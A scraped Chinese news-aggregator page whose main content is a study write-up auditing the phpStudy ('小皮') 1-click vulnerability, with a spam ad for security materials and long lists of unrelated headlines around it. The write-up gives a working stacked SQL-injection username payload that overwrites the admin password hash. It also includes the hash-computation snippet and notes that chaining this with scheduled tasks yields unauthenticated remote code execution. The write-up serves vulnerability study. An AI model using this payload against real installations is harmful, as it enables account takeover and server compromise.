最新要闻
- 天天亮点!百余名驻澳门部队官兵无偿献血
- 发射6枚火箭后 马斯克SpaceX的劲敌维珍轨道倒了:已申请破产
- 健康低脂 鲜嫩多汁:肌肉小王子即食鸡胸肉10袋19.9元
- iPhone自带天气应用崩了 苹果客服:没收到反馈 重启或升级试试
- 每日精选:力压美国!全球AI论文发表量前十机构:九所来自中国
- 焦点热门:电视剧《他是谁》收官!聂宝华下线了
- 每日信息:人民日报发声后!中央政法委将严查!刘国梁危险
- 世界观热点:杭州小伙高速开特斯拉 “自动驾驶”变“自动撞车”
- 全球热消息:GPT-4学会“自我反思”:测试表现提升达30%
- 世界视讯!酷睿独享大小核架构 至强CPU不会混搭:Intel解释原因
- 电视画质新高度 乐视发布85寸新品“让影像狂飙”
- 北京环球影城回应不让摄影师进:不允许商业旅拍 个人可以
- 每日热文:市应急管理局开展地震监测台站巡查工作
- 环球快报:“蜀道电行者”打好森林防火“组合拳”
- 快资讯:日媒:后锂离子电池时代竞争 中国碾压式领先日本、美国
- 全球今日讯!279元大额券:杰士邦零感003系列18枚30.9元狂促
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
小皮1-click漏洞的代码审计学习笔记
漏洞简介
漏洞起源于前段时间比较火的小皮 1-click 漏洞,用户名登录处缺少过滤,导致可以直接构造恶意 payload 实现存储型 XSS ,结合小皮本身所具有的计划任务,XSS + CSRF 实现了 RCE 。 因为用户名登录处缺少过滤,所以可以尝试 SQL 漏洞。
(相关资料图)
环境搭建
windows 上实际操作了一下,不方便进行分析
于是利用 linux 来进行复现分析,利用官网提供的方法执行,之后再回滚修改代码
wget -O install.shhttps://download.xp.cn/install.sh&& sudo bash install.sh
修改代码web/service/app/account.php
中登录的部分
if($type=="login"){ $username = post("username"); $pwd = post("password"); $verifycode = post("verifycode"); $res = Account::login($username,$pwd,$verifycode); xpexit(json_encode($res));}
打开代码/usr/local/phpstudy/web/service/app/account.php
修改代码
漏洞复现
windows
在用户登录处构造 payload 其中 PASSWORD 的值是经过五次 md5 加密后的结果
import hashlibstr = "123456"for i in range(0,5): str = hashlib.md5(str.encode()).hexdigest()print(str)
admin";UPDATE ADMINS set PASSWORD = "c26be8aaf53b15054896983b43eb6a65" where username = "admin";--
虽然提示用户名密码错误,但是密码已经被更新,再次利用 admin/123456 成功登录
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
Linux
在用户登录处构造 payload
admin";UPDATE ADMINS set PASSWORD = "c26be8aaf53b15054896983b43eb6a65" where username = "admin";--
错误类型并不相同,但也成功的将密码修改
漏洞分析
查看开放端口信息 ,发现有两个端口与 phpstudy 的进程相关 9080、8090
9080 对应的是 web 端的信息 8090 对应的是二进制程序
外部访问不到 8090 端口 只能再内部构造数据进行通信
项目的代码在/usr/local/phpstudy/web
web/service/app/account.php
web/service/app/model/Account.php
通过 POST 获取到的数据,利用 Socket 将数据发送到 8090 进行处理
我们可以根据代码逻辑伪造 socket 请求
{"command":"login","data":{"username":"admin","pwd":"123456"}}^^^
利用 strace 可以监控进程strace -s4096 -tt -f -ewrite -p 49433
监控 phpstudy 的进程,发送错误的payload
{"command":"login","data":{"username":"admin"","pwd":"123456"}}^^^
获取到登录时对应的 SQL 语句
SELECT ID FROM ADMINS WHERE ALIAS = "admin"" AND PASSWORD = "c26be8aaf53b15054896983b43eb6a65" AND STATUS = 0
根据 SQL 语句可以构造恶意语句,构造恶意语句,执行错误的 SQL 语句后,程序会发生崩溃,所以无法利用万能密码登录。
这里我们可以思考利用堆叠注入,执行多个 SQL 语句,修改 admin 用户密码。我们构造这样的用户名
admin";UPDATE ADMINS set PASSWORD = "c26be8aaf53b15054896983b43eb6a65" where username = "admin";--
拼接到 SQL 语句中就为
SELECT ID FROM ADMINS WHERE ALIAS = "admin";UPDATE ADMINS set PASSWORD = "c26be8aaf53b15054896983b43eb6a65" where username = "admin";--" AND PASSWORD = "c26be8aaf53b15054896983b43eb6a65" AND STATUS = 0
最终执行的 SQL 语句为
SELECT ID FROM ADMINS WHERE ALIAS = "admin";UPDATE ADMINS set PASSWORD = "c26be8aaf53b15054896983b43eb6a65" where username = "admin";
将用户 admin 的 密码修改为了 123456
再次登录时就可以使用 admin/123456 成功登录,再结合之前的 1-click RCE 中利用 phpstudy 后台计划任务执行,最终实现未授权 RCE 。
第一次登录时 使用 admin/123456 登录失败,提示用户名或者密码错误
输入构造的 payload
再次利用 admin/123456 登录成功,用户的密码已经被修改
更多靶场实验练习、网安学习资料,请点击这里>>
关键词:
-
使用vue2+element-ui+vuex实现后台管理系统的头部背景色动态点击修改
**以下内容仅供自己学习使用话不多说,直接上代码首先去vuex里面importVuefrom& 39;vue& 39;;importVuexfrom& 39;vuex& 39;;
来源: -
视焦点讯!Python数据分析第七周作业随笔记录
电商产品评论数据情感分析代码1:评论去重的代码 代码12-1评论去重的代码importpandasaspdimportreimportjieba possegaspsgi
来源: -
焦点速读:python文件操作:r、w、a、r+、w+、a+和b模式
对文件操作的基本步骤f=open(& 39;a txt& 39;,& 39;r& 39;,encoding=& 39;utf-8& 39;)data=f read()print(data)f
来源: 百事通!我进入银行科技部半年,已经丧失跳槽的能力了!
使用vue2+element-ui+vuex实现后台管理系统的头部背景色动态点击修改
视焦点讯!Python数据分析第七周作业随笔记录
焦点速读:python文件操作:r、w、a、r+、w+、a+和b模式
小皮1-click漏洞的代码审计学习笔记
天天亮点!百余名驻澳门部队官兵无偿献血
发射6枚火箭后 马斯克SpaceX的劲敌维珍轨道倒了:已申请破产
健康低脂 鲜嫩多汁:肌肉小王子即食鸡胸肉10袋19.9元
iPhone自带天气应用崩了 苹果客服:没收到反馈 重启或升级试试
每日精选:力压美国!全球AI论文发表量前十机构:九所来自中国
焦点热门:电视剧《他是谁》收官!聂宝华下线了
每日信息:人民日报发声后!中央政法委将严查!刘国梁危险
当前动态:Apache DB Utils教程_编程入门自学教程_菜鸟教程-免费教程分享
搭一下 Stable Diffusion WebUI
世界观热点:杭州小伙高速开特斯拉 “自动驾驶”变“自动撞车”
全球热消息:GPT-4学会“自我反思”:测试表现提升达30%
世界视讯!酷睿独享大小核架构 至强CPU不会混搭:Intel解释原因
电视画质新高度 乐视发布85寸新品“让影像狂飙”
北京环球影城回应不让摄影师进:不允许商业旅拍 个人可以
每日热文:市应急管理局开展地震监测台站巡查工作
【速看料】JavaScript:数组的sort()排序(遇到负数时如何处理)
游戏内存不能为read是什么原因?游戏内存不能为read的解决方法
魅族MX3上市时间和价格是多少?魅族mx3参数配置
hynix内存条是什么牌子?hynix内存条参数怎么看?
ibooks store不可用是怎么回事?ibooks store不可用怎么解决?
天龙八部3怎么把画面调小?天龙八部3装备评分排行榜
揭秘电诈手段|打开“屏幕共享”,存款不翼而飞
最全.NET Core 、.NET 5、.NET 6和.NET 7简介和区别
数学建模(三):模拟退火算法(SA)
今日要闻!Advanced Installer傻瓜式打包教程
环球快报:“蜀道电行者”打好森林防火“组合拳”
快资讯:日媒:后锂离子电池时代竞争 中国碾压式领先日本、美国
全球今日讯!279元大额券:杰士邦零感003系列18枚30.9元狂促
每日报道:5.75亿超《你的名字》!《铃芽之旅》成中国影史日本动画票房第一
环球快看点丨安徽淮北9级大风:女子睡醒发现房顶被吹走 网友羡慕睡眠质量
知名演员王刚清空社交账号 本人回应:没兴趣没精力经营
热消息:陕西发布清明出行预测:公路基本畅通运行,高速车流量是平日1.3倍
JAVA多线程并发编程-避坑指南
今日热闻!安装MYSQL_5.0/8.0教程(附数据库和客户端工具下载链接)
今日热议:易基因: oxRRBS+RRBS揭示炎症性肠病导致发育异常的表观遗传机制|甲基化研究
今日聚焦!导演陆川:AI 15秒生成的海报 比专业公司一个月做得还好
318川藏线突现雪崩 行车记录仪拍下惊险一幕
世界微资讯!5500元 一图读懂特斯拉补能神器CyberVault赛博充:专为中国用户定制
信息:“喝酒吃药”卷土重来!公募基金重仓股TOP50中贵州茅台仍在榜首,还有17只票被增持(附表)
【报资讯】南漳:油菜花开春意浓
世界观察:揭秘你不知道的“寒食节”:春秋时期延续至今 要吃青团、凉面
车评人批丰田埃尔法不装后防撞梁:一个倒车碰撞车体就变形
天天热资讯!消灭刘海挖孔!曝iPhone 17 Pro将是首款真全面屏苹果手机
全球信息:5A级薄荷抗菌 凉感冰丝太爽:卡帝乐鳄鱼夏季平角裤7.3元/条发车
观焦点:标准版终于要上高刷了!iPhone或2025年全系列引入LTPO技术
天天热讯:扫叶林风后,拾薪山雨前
day35 860. 柠檬水找零
当前快播:全网最详细中英文ChatGPT-GPT-4示例文档-智能AI辅助写作从0到1快速入门——官网推荐的48种最佳应用场景(附python/node.js/
环球微速讯:四月份去贵州旅游好吗_四月份去贵州旅游
戴苹果手表致手腕红肿你遇见没?苹果客服回应:或与皮肤敏感有关
全球微资讯!《拿破仑》年内公映
世界热消息:北汽越野BJ90狂降71万:打2.8折提换壳奔驰GLS
天天观天下!就是玩!马斯克将推特图标换成柴犬头像:还发了一幅漫画
每日讯息!村民回应网传奥迪轿车被当祭品焚烧:确实是意外
前沿热点:美克生能源携手新凤鸣集团 打造5MWh用户侧储能电站
天天关注:男生1900元买iPhone 14 Pro Max开机竟是安卓系统:商家被平台封禁
世界速看:铠侠成功研制出HLC闪存!SSD容量暴增:速度/耐用性比QLC还拉跨
环球观热点:2999元起 魅族20系列首销一秒破亿!京东、天猫多平台销冠
世界即时看!ChatGPT出现大规模封号; 我国移动网络IPv6流量首次突破50%;菜鸟首个航空运货中心落户深圳|Do早报
观焦点:Centos 分割卷组
焦点消息!中国恒大:公司与债权人特别小组成员签订三份重组支持协议
三利好助A股四月开门红 “小阳春”行情值得期待
每日消息!交易拥挤度创23年纪录 TMT板块还能热多久
要闻:国际金融市场早知道:4月4日
环球快资讯丨大家都越骂越买?iPhone 13成全球最畅销手机 小米为安卓挽尊
每日消息!国内将上映!真人电影《小美人鱼》最新预告 这美人鱼网友看完感叹
今日热闻!AMD Zen4加持!ROG首款掌机来了:比Switch强大太多
读SQL进阶教程笔记07_EXISTS谓词
gw文件用什么软件打开手机上_gw文件用什么软件打开
环球快播:《王者荣耀》杨玉环新皮肤官宣:时尚芭莎指导 春天的神女
环球速讯:外卖超20元才送?江苏省消保委:停止被迫“凑单”
前沿热点:LCD电视跌成白菜价 面板一哥京东方去年利润下滑71%
腰粗大树刮断砸中小轿车 女车主:不慌 先拍个视频
【当前独家】网传青海现野生大熊猫!专家:绝对不可能
【聚看点】c语言分解质因数_分解质因数的概念
全球要闻:网红书店言几又被强制执行6400万
centos 8 上sql server 安装
【全球热闻】HP发布暗影精灵9系列游戏本:RTX 4080干到13999元
【新要闻】1199元!海康Mage20 Pro家庭存储NAS发布:支持最大40TB容量
每日看点!对线!枪迷称落后22分曼联追分无望,内维尔怼阿森纳前15年战绩差
天天最资讯丨Flask
世界新消息丨Autoconfiguration详解——自动注入配置参数
当前速看:1080. 根到叶路径上的不足节点
【环球速看料】上下五千年 熊猫第一次有了站姐
环球滚动:菜鸟首个航空货运中心落户深圳:包裹效率提升30%
世界焦点!计算机系统的组成(1硬件系统篇)
昆自股份拟通过拍卖方式购买14套房产作为公司经营活动场所 评估价值为3516.56万
引入人工智能!米哈游刘伟:《崩坏:星穹铁道》将在NPC加入AI
终结者来临?让开发者都畏惧的AI真的对人类有威胁吗
【独家焦点】重回1元/包:中石化出品原生竹浆90抽*3层抽纸大促
观天下!11.98万起 广汽埃安爆款2023上新:48小时订单破万
我国民营火箭公司天兵科技将研发空天飞机:载100人全球任意地点往返
债市日报:4月3日
天天快报!上古卷轴五强制随从代码_上古卷轴5强制随从代码
天天消息!夜宿海底捞引争议!究竟谁在留宿?多数都为旅游的年轻人